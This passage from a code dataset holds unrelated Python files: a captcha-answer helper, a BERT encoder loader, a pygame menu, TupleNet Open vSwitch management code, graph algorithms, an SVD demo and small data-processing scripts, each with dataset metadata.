对深度学习还不熟悉, 想哭\ndef verify_captcha_byhand(captcha_img_path):\n from PIL import Image\n import matplotlib.pyplot as plt\n img = Image.open(captcha_img_path)\n plt.figure(\"verify and answer, separated answer(the index of captcha: 1-8) with ','\")\n plt.imshow(img)\n plt.show()\n nums = input('captcha id: ')\n items = nums.split(',')\n return ','.join([str(i) for i in map_items(items)])\n\n# verify captcha\ndef verify_captcha(captcha_path):\n return verify_captcha_auto(captcha_path) or verify_captcha_byhand(captcha_path)\n\n","sub_path":"booker/verify_captcha.py","file_name":"verify_captcha.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48894153","text":"# This file is adapted from from May et al. 2019: \"On Measuring Bias in Sentence Encoders\"\n# File: https://github.com/W4ngatang/sent-bias/blob/master/sentbias/encoders/bert.py\n\n\nimport torch\nimport pytorch_pretrained_bert as bert\nfrom transformers import AutoTokenizer\n\n\nMODELS = {\n 'bert': [\n 'bert-base-german-cased',\n 'bert-base-german-dbmdz-cased',\n 'bert-base-german-dbmdz-uncased',\n 'distilbert-base-german-cased'\n ],\n 'xlm': [\n 'xlm-mlm-ende-1024',\n 'xlm-clm-ende-1024'\n ]\n}\n\n\nTOKENIZERS = {\n 'deepset': 'bert-base-german-cased',\n 'dbmdz': 'bert-base-german-dbmdz-cased'\n}\n\n\ndef load_tokenizer(version):\n return AutoTokenizer.from_pretrained(TOKENIZERS[version])\n\n\ndef load_model(version):\n \"\"\"Load BERT model and corresponding tokenizer.\"\"\"\n tokenizer = bert.BertTokenizer.from_pretrained(version)\n model = bert.BertModel.from_pretrained(version)\n model.eval()\n return model, tokenizer\n\n\ndef encode(model, tokenizer, texts):\n \"\"\"Use tokenizer and model to encode texts.\"\"\"\n encs = {}\n for text in texts:\n tokenized = tokenizer.tokenize(text)\n indexed = tokenizer.convert_tokens_to_ids(tokenized)\n segment_idxs = [0] * len(tokenized)\n tokens_tensor = torch.tensor([indexed])\n segments_tensor = torch.tensor([segment_idxs])\n enc, _ = model(tokens_tensor, segments_tensor, output_all_encoded_layers=False)\n\n enc = enc[:, 0, :] # extract the last rep of the first input\n encs[text] = enc.detach().view(-1).numpy()\n return encs\n","sub_path":"bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191379922","text":"import pygame\nimport sys\nfrom main_menu.button import Boton\n\npygame.init()\n\"\"\"\nMenú principal\n\"\"\"\n\n\nW, H = 800, 500#Dimensiones de la ventana\n\nclass Menu_principal:\n\n\n def __init__(self):\n self.bg = pygame.image.load('BG.jpg')\n self.bg = pygame.transform.scale(self.bg, (W, H))\n self.comenzar = True#Comienza en el menú principal y lo matiene \n self.play = Boton(150, 200, 200, 200)#Botón de play\n self.exit = Boton(350, 200, 200, 200)#Botón de exit\n self.exit.img = pygame.image.load('buttons/exit.png')#Cambiar la imagen predeterminada por la del botón de exit\n\n\n def run(self):\n screen = pygame.display.set_mode((W, H))#Dimensiones de pantalla config\n font = pygame.font.SysFont(\"arial\", 50, italic=40)#Estilo y tamaño de texto\n main_text = font.render(\"Click on play for start\", True, (58, 238, 235))#Texto principal\n \n while self.comenzar:\n clock = int(pygame.time.get_ticks()/1000)#Segundos para hacer parpadear el texto\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1:\n #Si se clickea en el botón de play con el click derecho del mouse comenzar el juego\n if self.play.rect.collidepoint(event.pos):\n self.comenzar = False\n #Si se clickea en el botón de exit con el click derecho del mouse cerrar la ventana\n if self.exit.rect.collidepoint(event.pos):\n sys.exit()\n pygame.quit()\n \n screen.blit(self.bg, (0, 0))#Background para el menú principal\n #Mostrar el titulo cada 2 segundos\n if clock % 2 == 0:\n screen.blit(main_text, (160, 100))\n self.play.draw(screen)#Dibuja el botón de play en la pantalla\n self.exit.draw(screen)#Dibuja el botón de exit en la pantalla\n pygame.display.update()\n \n\n \n","sub_path":"main_menu/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"4443109","text":"import os\nimport json\nimport subprocess\nimport logging\nimport threading\nimport struct, socket\nimport time, random, string\nimport logicalview as lgview\nfrom pyDatalog import pyDatalog\nfrom onexit import on_parent_exit\nfrom tp_utils.run_env import is_gateway_chassis, get_extra\n\nlogger = logging.getLogger(__name__)\nflow_lock = threading.Lock()\nTP_TUNNEL_PORT_NAME_PREFIX = \"tupleNet-\"\n# In OpenFlow 1.0 and 1.1, re-adding a flow always resets the\n# flow's packet and byte counters to 0.\nOPENFLOW_VER = \"OpenFlow12\"\n\nclass OVSToolErr(Exception):\n pass\n\ndef call_popen(cmd, commu=None, shell=False):\n child = subprocess.Popen(cmd, shell=shell, stdout=subprocess.PIPE,\n stdin=subprocess.PIPE, stderr=subprocess.PIPE)\n if commu is None:\n output = child.communicate()\n else:\n output = child.communicate(commu)\n if child.returncode:\n raise RuntimeError(\"error executing %s\" % (' '.join(cmd)))\n if len(output) == 0 or output[0] is None:\n output = \"\"\n else:\n output = output[0].decode(\"utf8\").strip()\n return output\n\ndef call_ovsprog(prog, args_list, commu=None):\n cmd = [prog, \"--timeout=5\"] + args_list\n retry_n = 0\n while True:\n try:\n return call_popen(cmd, commu)\n except Exception as err:\n retry_n += 1\n if retry_n == 3:\n raise err\n continue\n\ndef ovs_ofctl(*args):\n return call_ovsprog(\"ovs-ofctl\", list(args))\n\ndef aggregate_flows(flows):\n length = 500\n flow_seg = [flows[x : x + length] for x in range(0, len(flows), length)]\n for seg in flow_seg:\n yield '\\n'.join(seg)\n\ndef ovs_ofctl_delflows_batch(br, flows):\n for flow_combind in aggregate_flows(flows):\n call_ovsprog(\"ovs-ofctl\", ['del-flows', '-O', OPENFLOW_VER, br,\n '--strict', '-'],\n commu=flow_combind)\n\n\ndef ovs_ofctl_addflows_batch(br, flows):\n for flow_combind in aggregate_flows(flows):\n call_ovsprog(\"ovs-ofctl\", ['add-flow', '-O', OPENFLOW_VER, br, '-'],\n commu=flow_combind)\n\ndef ovs_vsctl(*args):\n return call_ovsprog(\"ovs-vsctl\", list(args))\n\ndef parse_map(map_list):\n ret_map = {}\n if map_list[0] != 'map':\n return None\n for entry in map_list[1]:\n ret_map[entry[0]] = entry[1]\n return ret_map\n\ndef update_ovsport(record, entity_zoo):\n action_type = record[1]\n if action_type in ['new', 'initial', 'delete', 'old', 'insert']:\n # some operations may not contain some essential fields\n if not isinstance(record[2], int) or \\\n record[3] == None or record[4] == None:\n logger.debug('action %s does not container enough info, msg:%s',\n action_type, record)\n return\n else:\n logger.warning(\"unknow action_type:%s\", action_type)\n return\n\n logger.info(\"ovsport action type:%s\", action_type)\n\n ofport = record[2]\n name = record[3]\n external_ids = parse_map(record[4])\n port_type = record[5]\n\n # adding an interal port may imply that an new bridge was created,\n # we should update zoo's version to test if tuplenet should rebuild\n # patchports.\n if port_type == 'internal':\n entity_zoo.update_version_force()\n\n if external_ids.has_key('iface-id'):\n uuid = external_ids['iface-id']\n is_remote = False\n entity_type = lgview.LOGICAL_ENTITY_TYPE_OVSPORT\n elif external_ids.has_key('chassis-id'):\n uuid = external_ids['chassis-id']\n is_remote = True\n entity_type = lgview.LOGICAL_ENTITY_TYPE_OVSPORT_CHASSIS\n else:\n logger.info('external_ids has no chassis-id or iface-id, record:%s',\n record)\n return\n\n if action_type in ['old', 'delete']:\n logger.info(\"try to move port %s to sink uuid:%s\", name, uuid)\n entity_zoo.move_entity2sink(entity_type, name)\n else:\n if ofport < 0:\n logger.info(\"do not accept ovsport %s which has negative ofport %d\", name, ofport)\n return\n logger.info(\"try to add ovsport entity %s ofport:%d, uuid:%s in zoo\",\n name, ofport, uuid)\n entity_zoo.add_entity(entity_type, name, uuid, ofport, is_remote)\n return\n\n\ndef monitor_ovsdb(entity_zoo, extra):\n pyDatalog.Logic(extra['logic'])\n cmd = ['ovsdb-client', 'monitor', 'Interface',\n 'ofport', 'name', 'external_ids', 'type', '--format=json']\n\n logger.info(\"start ovsdb-client instance\")\n try:\n child = subprocess.Popen(cmd, stdout=subprocess.PIPE,\n preexec_fn=on_parent_exit('SIGTERM'))\n with extra['lock']:\n extra['ovsdb-client'] = child\n logger.info(\"monitoring the ovsdb\")\n while child.poll() == None:\n json_str = child.stdout.readline().strip()\n output = json.loads(json_str)\n with entity_zoo.lock:\n for record in output['data']:\n update_ovsport(record, entity_zoo)\n except ValueError as err:\n if json_str != \"\":\n logger.warning(\"cannot parse %s to json object\", json_str)\n else:\n logger.info('json_str is empty, maybe we should exit')\n subprocess.Popen.kill(child)\n return\n except Exception as err:\n logger.exception(\"exit ovsdb-client monitor, err:%s\", str(err))\n subprocess.Popen.kill(child)\n return\n\ndef start_monitor_ovsdb(entity_zoo, extra):\n t = threading.Thread(target = monitor_ovsdb,\n args=(entity_zoo, extra))\n t.setDaemon(True)\n t.start()\n return t\n\ndef clean_ovs_flows(br = 'br-int'):\n try:\n ovs_ofctl(\"del-flows\", br)\n except Exception as err:\n logger.error(\"failed to clean bridge %s flows\", br)\n raise OVSToolErr(\"failed to clean ovs flows\")\n else:\n logger.info(\"clean all flows in %s\", br)\n\ndef insert_ovs_ipfix(br = 'br-int'):\n try:\n ovs_vsctl('clear', 'bridge', br, 'ipfix')\n\n options = get_extra()['options']\n if 'IPFIX_CFG' in options:\n cfg = options['IPFIX_CFG']\n logger.debug('add ipfix record {}'.format(cfg))\n\n ovs_vsctl('--', 'set', 'Bridge', br, 'ipfix=@i', '--', '--id=@i', \\\n 'create', 'IPFIX', 'targets=\\\"{}\\\"'.format(cfg['collector']), \\\n 'obs_domain_id={}'.format(cfg['domain_id']), \\\n 'obs_point_id={}'.format(cfg['point_id']), \\\n 'sampling={}'.format(cfg['sampling_rate']), \\\n 'other_config:enable-tunnel-sampling=flase')\n except Exception as e:\n logger.error('failed to alter ipfix record for %s: %s', br, e)\n raise OVSToolErr('failed to alter ipfix record: ' + str(e))\n\ndef system_id():\n cmd = ['ovsdb-client', '-v', 'transact',\n '[\"Open_vSwitch\",{\"op\":\"select\", \\\n \"table\":\"Open_vSwitch\",\"columns\":[\"external_ids\"], \\\n \"where\":[]}]']\n try:\n json_str = call_popen(cmd, shell=False)\n except Exception:\n logger.error('failed to get system-id')\n return\n output = json.loads(json_str)[0]\n external_ids = parse_map(output['rows'][0]['external_ids'])\n if external_ids.has_key('system-id'):\n return external_ids['system-id']\n\ndef remove_tunnel_by_name(portname):\n try:\n ovs_vsctl('get', 'interface', portname, 'name')\n except Exception as err:\n # cannot found this port, return immedately\n logger.debug(\"port %s is not exist, no need to remove it\", portname)\n return\n try:\n ovs_vsctl('del-port', 'br-int', portname)\n except Exception as err:\n logger.info(\"cannot delete tunnel port:%s\", err)\n logger.info(\"delete ovs tunnel port %s\", portname)\n return\n\ndef get_tunnel_chassis_id(portname):\n try:\n return ovs_vsctl('get', 'interface', portname,\n 'external_ids:chassis-id').strip(\"\\\"\")\n except Exception as err:\n return \"\"\n\ndef chassis_ip_to_portname(ip):\n chassis_ip_int = struct.unpack(\"!L\", socket.inet_aton(ip))[0]\n portname = '{}{}'.format(TP_TUNNEL_PORT_NAME_PREFIX, chassis_ip_int)\n return portname\n\ndef remove_tunnel_by_ip(ip):\n portname = chassis_ip_to_portname(ip)\n remove_tunnel_by_name(portname)\n\ndef create_tunnel(ip, uuid):\n portname = chassis_ip_to_portname(ip)\n if get_tunnel_chassis_id(portname) == uuid:\n logger.info(\"found a exist tunnel ovsport has \"\n \"same chassis-id and portname, skip adding tunnel ovsport\")\n return portname\n remove_tunnel_by_name(portname)\n cmd = ['add-port', 'br-int', portname, '--', 'set', 'interface',\n portname, 'type=geneve', 'options:remote_ip={}'.format(ip),\n 'options:key=flow', 'options:csum=true',\n 'external_ids:chassis-id={}'.format(uuid)]\n logger.info(\"adding ovs tunnel port %s\", portname)\n try:\n ovs_vsctl(*cmd)\n except Exception as err:\n logger.error('cannot create tunnle, cmd:%s, err:%s', cmd, err)\n return portname\n\n return portname\n\ndef create_flowbased_tunnel(chassis_id):\n portname = \"{}flowbased\".format(TP_TUNNEL_PORT_NAME_PREFIX)\n remove_tunnel_by_name(portname)\n cmd = ['add-port', 'br-int', portname, '--', 'set', 'interface',\n portname, 'type=geneve', 'options:remote_ip=flow',\n 'options:key=flow', 'options:csum=true',\n 'external_ids:chassis-id={}'.format(chassis_id)]\n logger.info(\"adding ovs tunnel port %s\", portname)\n try:\n ovs_vsctl(*cmd)\n except Exception as err:\n logger.error('cannot create flow-based tunnle, cmd:%s, err:%s',\n cmd, err)\n return portname\n\n\ndef create_patchport(portname, peer_br, br = 'br-int'):\n peer_portname = portname + \"-peer\"\n try:\n ovs_vsctl('br-exists', peer_br)\n except:\n logger.info(\"the bridge %s is not exist, would not create patchports\",\n peer_br)\n return\n\n cmd = []\n try:\n ovs_vsctl('list', 'interface', portname)\n except:\n cmd += ['--', 'add-port', br, portname,\n '--', 'set', 'interface', portname, 'type=patch',\n 'options:peer={}'.format(peer_portname),\n 'external_ids:iface-id={}'.format(portname)\n ]\n\n try:\n ovs_vsctl('list', 'interface', peer_portname)\n except:\n cmd += ['--', 'add-port', peer_br, peer_portname,\n '--', 'set', 'interface', peer_portname, 'type=patch',\n 'options:peer={}'.format(portname),\n 'external_ids:iface-id={}'.format(peer_portname)\n ]\n if len(cmd) == 0:\n logger.info(\"the patchports had been created, skip..\")\n return\n\n try:\n ovs_vsctl(*cmd)\n except Exception as err:\n logger.warning(\"failed to create patchport, err:%s\", err)\n else:\n logger.info(\"created patchport %s, %s\", portname, peer_portname)\n\n\ndef delete_patchport(portname):\n try:\n peer_portname = ovs_vsctl('get', 'interface', portname,\n 'options:peer').strip(\"\\\"\")\n except Exception as err:\n logger.warning(\"failed to get %s peer patchport information, err:%s\",\n portname, err)\n return\n try:\n ovs_vsctl('del-port', portname)\n except Exception as err:\n logger.warning(\"failed to delete patchport %s, err:%s\", portname, err)\n return\n\n try:\n ovs_vsctl('list', 'interface', peer_portname)\n except Exception as err:\n logger.warning(\"failed to find patchport %s, err:%s\",\n peer_portname, err)\n return\n try:\n ovs_vsctl('del-port', peer_portname)\n except Exception as err:\n logger.warning(\"failed to delete patchport %s, err:%s\", peer_portname, err)\n return\n logger.info(\"removed patchport %s %s\", portname, peer_portname)\n\ndef commit_replaceflows(replace_flows, br = 'br-int'):\n # commit_replaceflows is only consumed by update_logical_view in booting\n # tuplenet stage. Keep all flows in a file to avoid using stdin which may\n # introduce buffer size issue.\n # this function can help to avoid ports' issue of breaking-network, the\n # replace-flows is a transaction, so would not change flows if it hit issue\n filepath = '/tmp/ovs-flow-{}'.format(''.join(\n random.choice(string.ascii_uppercase + string.digits) for _ in range(5)))\n filepath += str(time.time())\n try:\n with open(filepath, 'w') as fp:\n fp.write('\\n'.join(replace_flows))\n ovs_ofctl('replace-flows', '-O', OPENFLOW_VER, br, filepath)\n os.remove(filepath)\n except IOError as err:\n logger.error(\"failed to write flows into file %s\", filepath)\n raise\n except RuntimeError as err:\n logger.error(\"failed to replace flows in {}\".format(filepath))\n raise OVSToolErr(\"failed to replace flows\")\n except OSError as err:\n logger.warning(\"failed to remove the %s\", filepath)\n raise\n\n\n\ndef commit_flows(add_flows, del_flows):\n # consume batch method to insert/delete flows first.\n # update ovs flow one by one if updateing flow hit issue.\n\n with flow_lock:\n try:\n total_flow_n = len(del_flows) + len(add_flows)\n if len(del_flows) > 0:\n ovs_ofctl_delflows_batch('br-int', del_flows)\n del_flows = []\n if len(add_flows) > 0:\n ovs_ofctl_addflows_batch('br-int', add_flows)\n add_flows = []\n return total_flow_n\n except Exception as err:\n logger.warn(\"failed to batch modify flows, \"\n \"will try to update one by one, err:%s\", err)\n\n # insert/delete flow one by one once the batch processing hit error\n cm_cnt = 0\n for flow in del_flows:\n try:\n ovs_ofctl('del-flows', 'br-int', flow, '--strict')\n except Exception as err:\n logger.error('failed to delete flow(%s) at ovs, err:%s',\n flow, err)\n continue;\n cm_cnt += 1\n\n for flow in add_flows:\n try:\n ovs_ofctl('add-flow', 'br-int', flow)\n except Exception as err:\n logger.error('failed to add flow(%s) at ovs, err:%s',\n flow, err)\n continue;\n cm_cnt += 1\n return cm_cnt;\n\ndef _set_br_failmode(br, mode):\n try:\n cur_mode = ovs_vsctl('get-fail-mode', br)\n except Exception:\n logger.error(\"failed to get fail mode of bridge %s\", br)\n raise OVSToolErr(\"failed to get fail mode of bridge\")\n if cur_mode != mode:\n logger.info(\"config bridge %s fail-mode into %s\", br, mode)\n try:\n ovs_vsctl('set-fail-mode', br, mode)\n except Exception:\n logger.error(\"failed to config %s fail-mode into %s\", br, mode)\n raise OVSToolErr(\"failed to config fail-mode\")\n\ndef _get_br_integration_mac(br):\n try:\n mac = ovs_vsctl('get', 'interface', br, 'mac_in_use')\n except Exception:\n logger.error(\"failed to get bridge %s's mac_in_use\", br)\n return\n mac = mac.encode('ascii','ignore').replace('\"', '')\n return mac\n\ndef build_br_integration(br = 'br-int'):\n try:\n ovs_vsctl('br-exists', br)\n logger.info(\"the bridge %s is exist\", br)\n _set_br_failmode(br, 'secure')\n # if we hit no issue, then it means the bridge is exist\n return _get_br_integration_mac(br)\n except Exception as err:\n logger.info(\"the bridge %s is not exist, try to create a new one\", br)\n try:\n ovs_vsctl('add-br', br, '--', 'set', 'Bridge', br, 'fail-mode=secure')\n logger.info(\"create bridge %s for integration\", br)\n except Exception as err:\n logger.error(\"failed to create %s\", br)\n raise OVSToolErr(\"failed to create integration bridge\")\n\n return _get_br_integration_mac(br)\n\ndef set_tunnel_tlv(vipclass = 0xffee, br = 'br-int'):\n while True:\n try:\n output = ovs_ofctl('dump-tlv-map', br)\n except Exception as err:\n logger.error(\"failed dump %s tlv, err:%s\", br, err)\n raise OVSToolErr(\"failed to dump tlv\")\n # TODO it is a fool check, update it\n if \"tun_metadata0\" in output:\n logger.info(output)\n return\n\n try:\n ovs_ofctl('del-tlv-map', br)\n except Exception as err:\n logger.error(\"failed to clean %s tlv, err:%s\", br, err)\n raise OVSToolErr(\"failed to clean tlv\")\n\n tlv = \"{{class={},type=0,len=8}}->tun_metadata0\".format(vipclass)\n try:\n ovs_ofctl('add-tlv-map', br, tlv)\n except Exception as err:\n logger.error('failed to config tlv %s to %s, err:%s', tlv, br, err)\n raise OVSToolErr(\"failed to config tlv\")\n\n logger.info(\"set tlv %s on %s\", tlv, br)\n\ndef set_upcall_rate(br = 'br-int', rate = 100):\n #TODO we need to limite the packet rate of upcalling to packet_controller\n pass\n\n\ndef config_ovsport_bfd(portname, config):\n try:\n ovs_vsctl('set', 'Interface', portname, 'bfd:{}'.format(config))\n except Exception as err:\n logger.info(\"failed to config %s bfd to %s, \"\n \"port may not exist, err:%s\",\n portname, config, err)\n\ndef inject_pkt_to_ovsport(cmd_id, packet_data, ofport):\n try:\n ovs_ofctl('packet-out', 'br-int', 'NONE',\n ('load:{}->NXM_OF_IN_PORT[],'\n 'load:{}->NXM_NX_REG10[16..31],'\n 'load:1->NXM_NX_REG10[1],resubmit(,0)').format(ofport, cmd_id),\n packet_data)\n except Exception as err:\n logger.warning(\"failed to inject packet %s to ofport %d\",\n packet_data, ofport)\n\n","sub_path":"src/tuplenet/lcp/commit_ovs.py","file_name":"commit_ovs.py","file_ext":"py","file_size_in_byte":18006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608156924","text":"import csv\r\nimport heapq\r\nfrom collections import deque\r\nfrom TDAgrafo import *\r\n\r\nINF = 9999999\r\n\r\ndef parsear_archivo_grafo(file,grafo):\r\n vertices = {}\r\n with open (file,\"r\") as f:\r\n f_reader = csv.reader(f,delimiter=',')\r\n for row in f_reader:\r\n if(len(row)==3):\r\n try:\r\n vertice = row[0]\r\n coordenadas = (float(row[1]),float(row[2]))\r\n grafo.agregar_vertice(vertice,coordenadas)\r\n\r\n except ValueError:\r\n vertice = row[0]\r\n arista = row[1]\r\n peso = int(row[2])\r\n grafo.agregar_arista(vertice,arista,peso)\r\n\r\n return grafo\r\n\r\ndef parsear_recomendaciones(file, grafo):\r\n grafo_dirigido = Grafo()\r\n\r\n for vertice in grafo.obtener_vertices():\r\n grafo_dirigido.agregar_vertice(vertice)\r\n\r\n with open (file,\"r\") as f:\r\n f_reader = csv.reader(f, delimiter=',')\r\n for row in f_reader:\r\n vertice_entrada = row[0]\r\n vertice_salida = row[1]\r\n grafo_dirigido.agregar_arista_dirigido(vertice_entrada, vertice_salida, grafo.obtener_peso_arista(vertice_entrada, vertice_salida))\r\n return grafo_dirigido\r\n\r\n\r\ndef costo_trayecto(grafo,trayecto):\r\n costo = 0\r\n for sede in range (0,len(trayecto)):\r\n try:\r\n act = trayecto[sede]\r\n prox = trayecto[sede+1]\r\n\r\n costo += grafo.obtener_peso_arista(act,prox)\r\n except IndexError:\r\n break\r\n return costo\r\n\r\n\r\ndef reconstruir_ciclo(padre, origen, destino):\r\n camino = []\r\n actual = destino\r\n while actual != origen:\r\n camino.insert(0,actual)\r\n actual = padre[actual]\r\n camino.insert(0,origen)\r\n return camino\r\n\r\ndef camino_minimo(grafo,inicio,fin):\r\n distancia = dict.fromkeys(grafo.obtener_vertices(),INF)\r\n padre = {}\r\n heap = []\r\n\r\n\r\n distancia[inicio] = 0\r\n padre[inicio] = None\r\n\r\n heapq.heappush(heap,(inicio,distancia[inicio]))\r\n\r\n while heap:\r\n v = heapq.heappop(heap)\r\n try:\r\n for w in grafo.obtener_adyacentes(v[0]):\r\n if (distancia[v[0]] + grafo.obtener_peso_arista(v[0],w) < distancia[w]):\r\n padre[w] = v[0]\r\n distancia[w] = distancia[v[0]] + grafo.obtener_peso_arista(v[0],w)\r\n heapq.heappush(heap,(w,distancia[w]))\r\n except TypeError:\r\n continue\r\n\r\n trayecto = reconstruir_ciclo(padre,inicio,fin)\r\n costo = costo_trayecto(grafo,trayecto)\r\n return trayecto,costo\r\n\r\n\r\ndef arbol_tendido_minimo_prim(grafo):\r\n inicio = grafo.obtener_vertice_random()\r\n # inicio = grafo.obtener_vertices()[5]\r\n\r\n visitados = []\r\n peso_total = 0\r\n heap = []\r\n arbol = Grafo()\r\n for vertice in grafo.obtener_vertices():\r\n arbol.agregar_vertice(vertice)\r\n\r\n for w in grafo.obtener_adyacentes(inicio):\r\n peso = grafo.obtener_peso_arista(inicio, w)\r\n heapq.heappush(heap, (peso,inicio,w))\r\n i = 0\r\n\r\n while heap:\r\n (peso, origen, destino) = heapq.heappop(heap)\r\n if destino not in visitados:\r\n visitados.append(destino)\r\n arbol.agregar_arista(origen,destino,peso)\r\n if i != 0:\r\n peso_total += peso\r\n i += 1\r\n for a in grafo.obtener_adyacentes(destino):\r\n peso = grafo.obtener_peso_arista(destino,a)\r\n if (a not in visitados):\r\n heapq.heappush(heap, (peso,destino,a))\r\n\r\n return (visitados,peso_total),arbol\r\n\r\ndef problema_viajante_bt(grafo, origen):\r\n\r\n visitados = []\r\n mejor_recorrido = [(INF, [])]\r\n _problema_viajante_bt(grafo, origen, origen, visitados, mejor_recorrido, 0)\r\n mejor_recorrido[0][1].append(origen)\r\n return mejor_recorrido[0]\r\n\r\n\r\ndef _problema_viajante_bt(grafo, origen, v, visitados, mejor_recorrido, recorrido_actual):\r\n visitados.append(v)\r\n if len(visitados) == grafo.cantidad_vertices():\r\n return grafo.obtener_peso_arista(v, origen)\r\n\r\n if recorrido_actual > mejor_recorrido[0][0]:\r\n return 0\r\n\r\n for w in grafo.obtener_adyacentes(v):\r\n if w not in visitados:\r\n recorrido_actual += grafo.obtener_peso_arista(v, w)\r\n siguiente = _problema_viajante_bt(grafo, origen, w, visitados, mejor_recorrido, recorrido_actual)\r\n recorrido_actual += siguiente\r\n\r\n if len(visitados) == grafo.cantidad_vertices() and recorrido_actual < mejor_recorrido[0][0]:\r\n mejor_recorrido[0] = (recorrido_actual, visitados[:])\r\n\r\n visitados.pop()\r\n\r\n recorrido_actual -= (grafo.obtener_peso_arista(v,w) + siguiente)\r\n return recorrido_actual\r\n\r\n\r\ndef obtener_arista_minima(grafo, vertice, visitados):\r\n arista_minima = (INF, None)\r\n for adyacente in grafo.obtener_adyacentes(vertice):\r\n if adyacente not in visitados:\r\n peso = grafo.obtener_peso_arista(vertice, adyacente)\r\n if arista_minima[0] > peso:\r\n arista_minima = (peso, adyacente)\r\n return arista_minima\r\n\r\n\r\ndef viajante_aproximado(grafo, inicio):\r\n visitados = []\r\n peso_camino = 0\r\n camino_eficiente = _viajante_aproximado(grafo, inicio, inicio, visitados, peso_camino)\r\n\r\n return camino_eficiente\r\n\r\n\r\ndef _viajante_aproximado(grafo, origen, inicio, visitados, peso_camino):\r\n visitados.append(inicio)\r\n\r\n if len(visitados) == grafo.cantidad_vertices():\r\n peso_camino += grafo.obtener_peso_arista(inicio, origen)\r\n visitados.append(origen)\r\n return peso_camino, visitados\r\n\r\n arista_minima = obtener_arista_minima(grafo, inicio, visitados)\r\n peso_camino += arista_minima[0]\r\n return _viajante_aproximado(grafo, origen, arista_minima[1], visitados, peso_camino)\r\n\r\n\r\ndef orden_topologico(grafo):\r\n grado_entrada = {}\r\n\r\n for v in grafo.obtener_vertices():\r\n grado_entrada[v] = 0\r\n for v in grafo.obtener_vertices():\r\n for w in grafo.obtener_adyacentes(v):\r\n grado_entrada[w] += 1\r\n\r\n cola = deque()\r\n\r\n for z in grado_entrada.keys():\r\n if grado_entrada[z] == 0:\r\n cola.append(z)\r\n\r\n salida = []\r\n peso = 0\r\n\r\n while cola:\r\n v = cola.popleft()\r\n salida.append(v)\r\n for w in grafo.obtener_adyacentes(v):\r\n grado_entrada[w] -= 1\r\n peso += grafo.obtener_peso_arista(v,w)\r\n if grado_entrada[w] == 0:\r\n cola.append(w)\r\n return peso, salida\r\n","sub_path":"tejotools.py","file_name":"tejotools.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"439021121","text":"import cv2\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom scipy import misc\n\n# read image\nimg_path = \"/home/student-5/Downloads/im1.jpg\"\nim = cv2.imread(img_path, 0)\nim = im.astype(np.float64)/255\n\ncv2.imshow(\"orig img\", im)\n\n# create noise matrix\nnoise = np.random.rand(im.shape[0], im.shape[1])\ncv2.imshow(\"noise\", noise)\n\n# multiply to create a noise image\nnoise_img = np.dot(noise, im)\ncv2.imshow(\"noisy img\", noise_img/np.amax(noise_img)) # normalize\n\n\n\n# find noise inverse using SVD\nU, s, Vt = np.linalg.svd(noise)\n\n\nS = np.linalg.inv(np.diag(s))\nUt = np.transpose(U)\nV = np.transpose(Vt)\n\nnoise_inverse = np.dot(np.dot(V, S), Ut)\n\nreverted_im = np.dot(noise_inverse, noise_img)\n#\n# n = s.shape[0]\n# s_sorted = np.argsort(s)\n# rms=[]\n# for k in range(n):\n# s[s_sorted[:n-k]] = 0 # take indices of n-k smallest\n# rms.append(np.sqrt(np.mean(np.square(im - reverted_im))))\n# plt.plot(range(k), rms)\n# plt.show()\n# revert original image using inverted noise matrix\ncv2.imshow(\"reverted img using SVD\", reverted_im )\n\ncv2.waitKey(0)\n\n\n\n\n\n\n\n","sub_path":"imageProc/svd.py","file_name":"svd.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613465331","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 22 19:10:06 2019\n\n@author: James\n\"\"\"\nimport numpy as np\nimport pandas\n#Do Later: https://matplotlib.org/tutorials/index.html#introductory\n\ndef pandasDataFrame():\n myarray = np.array([[1, 2, 3], [4, 5, 6]])\n np.set_printoptions(threshold=np.inf)\n print(myarray)\n print('\\n')\n rownames = ['a', 'b']\n colnames = ['one', 'two', 'three']\n mydataframe = pandas.DataFrame(myarray, index=rownames, columns=colnames)\n print(mydataframe)\n\n\npandasDataFrame()\n","sub_path":"Less2.py","file_name":"Less2.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"573169830","text":"import pandas as pd \nimport numpy as np\n\n\ndf1 = pd.read_csv(\"renametrain.csv\")\ndf2 = pd.read_csv(\"speechdata.csv\")\n\ndef f(tx):\n\tt = tx.lower()\n\tx = df2[df2['index']==t]['promptsForPython'].values[0]\n\treturn x\n\n\ndf = df1\n\ndf['prompttexts'] = df['prompt'].apply(f)\n\ndf.to_csv(\"speechprompts.csv\")\n\n\nprompts = df[['samplenumber','prompttexts']].values.tolist()\n\n\nf1 = open('sentences.txt','w')\n\nfor prompt in prompts:\n\ttxt = '*/'+prompt[0]+' '+prompt[1]\n\tprint(txt,file=f1)\n\nf1.close()\n\n\n\n","sub_path":"Model Example/model/dataPrep/trainspeech/speechpromtcombi.py","file_name":"speechpromtcombi.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241920210","text":"\"\"\"\npghoard\n\nCopyright (c) 2016 Ohmu Ltd\nSee LICENSE for details\n\"\"\"\nfrom pghoard.common import create_alert_file, get_object_storage_config\nfrom pghoard.rohmu.compat import suppress\nfrom pghoard.rohmu.errors import (\n FileNotFoundFromStorageError,\n LocalFileIsRemoteFileError,\n)\nfrom pghoard.rohmu import get_transfer\nfrom queue import Empty\nfrom threading import 